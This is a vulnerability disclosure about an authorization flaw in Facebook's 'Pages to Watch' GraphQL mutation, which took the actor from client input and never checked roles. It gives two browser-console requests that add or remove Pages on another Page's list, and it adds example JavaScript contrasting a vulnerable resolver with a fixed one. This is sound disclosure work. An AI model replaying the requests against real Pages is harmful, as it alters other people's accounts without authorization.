Published On: 24 Apr 2020
In the Insights settings of a Facebook Page there is a feature called "Pages to Watch". It compares the performance of your Page and its posts with similar Pages on Facebook.
Only Page admins should be able to add or remove Pages on that list, but the vulnerable GraphQL endpoint did not verify the actor of the action: the actor_id is taken from the request variables, which the client controls, and no role check was done against the target page_id.
As a result it was possible to add or remove Pages from the "Pages to Watch" list of a Page without holding any role on that Page.
Step 1
By calling this in the browser console one was able to add pages to the list:
new AsyncRequest('/api/graphql?variables={"input":{"client_mutation_id":"1","actor_id":"<actor_id>","page_id":"<PAGEONE_ID>","competitor_id":"<PAGETWO_ID>","action":"add"}}&doc_id=2182889891748094').send()
Step 2
By calling this in the browser console one was able to remove pages from the list:
new AsyncRequest('/api/graphql?variables={"input":{"client_mutation_id":"1","actor_id":"<actor_id>","page_id":"<PAGEONE_ID>","competitor_id":"<PAGETWO_ID>","action":"delete"}}&doc_id=2182889891748094').send()
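To make the root cause concrete, here is an added example (not Facebook's code, and not from the original report) that models the server side of such a mutation twice: once with the bug described above, where the resolver trusts the client-supplied actor_id and never checks roles, and once hardened so the actor comes from the authenticated session and must hold the ADMIN role on page_id. The data model (pageRoles, the watch-list map, the user and page ids) is constructed for illustration.

```javascript
// Added example: a minimal model of the "Pages to Watch" mutation.
// Hypothetical data model and helper names; this is not Facebook's code.

// Constructed sample data: roles held on each Page, keyed by page id then user id.
const pageRoles = {
  PAGEONE: { user_admin: 'ADMIN', user_editor: 'EDITOR' },
};

// Constructed watch lists: page id -> Set of competitor page ids.
// Returned fresh so each scenario starts from the same state.
function freshWatchLists() {
  return { PAGEONE: new Set(['PAGEOLD']) };
}

// Shared mutation body: apply "add" or "delete" to the page's watch list.
function applyAction(list, input) {
  if (input.action === 'add') {
    list.add(input.competitor_id);
  } else if (input.action === 'delete') {
    list.delete(input.competitor_id);
  } else {
    return { ok: false, error: 'BAD_ACTION' };
  }
  return { ok: true };
}

// Vulnerable resolver: the session is ignored, input.actor_id is whatever the
// client put in the GraphQL variables, and no role on input.page_id is checked.
function updatePagesToWatchVulnerable(session, input, watchLists) {
  const list = watchLists[input.page_id];
  if (!list) return { ok: false, error: 'NO_SUCH_PAGE' };
  const result = applyAction(list, input);
  return result.ok ? { ok: true, actor: input.actor_id } : result;
}

// Hardened resolver: the actor is the authenticated user from the session,
// a client-supplied actor_id that disagrees with it is rejected, and the
// mutation only runs if that user is an ADMIN of the target page.
function updatePagesToWatchFixed(session, input, watchLists) {
  const actor = session && session.user_id;
  if (!actor) return { ok: false, error: 'UNAUTHENTICATED' };
  if (input.actor_id !== undefined && input.actor_id !== actor) {
    return { ok: false, error: 'ACTOR_MISMATCH' };
  }
  // Role check happens before touching the list, so a missing page and a
  // page the actor has no role on both come back as FORBIDDEN.
  const roles = pageRoles[input.page_id];
  if (!roles || roles[actor] !== 'ADMIN') {
    return { ok: false, error: 'FORBIDDEN' };
  }
  const list = watchLists[input.page_id];
  if (!list) return { ok: false, error: 'NO_SUCH_PAGE' };
  const result = applyAction(list, input);
  return result.ok ? { ok: true, actor } : result;
}

// Replays the reported attack against both resolvers: an attacker with no role
// on PAGEONE sends the same variables the report shows, with their own actor_id.
function replayAttack() {
  const attackerSession = { user_id: 'user_attacker' };
  const input = {
    client_mutation_id: '1',
    actor_id: 'user_attacker',
    page_id: 'PAGEONE',
    competitor_id: 'PAGETWO',
    action: 'add',
  };
  const vulnLists = freshWatchLists();
  const vuln = updatePagesToWatchVulnerable(attackerSession, input, vulnLists);
  const fixedLists = freshWatchLists();
  const fixed = updatePagesToWatchFixed(attackerSession, input, fixedLists);
  return {
    vulnerableAccepted: vuln.ok,
    vulnerableListChanged: vulnLists.PAGEONE.has('PAGETWO'),
    fixedError: fixed.error,
    fixedListChanged: fixedLists.PAGEONE.has('PAGETWO'),
  };
}

module.exports = { updatePagesToWatchVulnerable, updatePagesToWatchFixed, freshWatchLists, replayAttack };
```

The important design point is that authorization is derived from the session, not from the mutation input: actor_id in the variables is at best a consistency hint, and the role lookup keys on page_id, which is also attacker-controlled, so a check that only confirms "this user exists" or "this user is an admin of some Page" would still leave the bug in place.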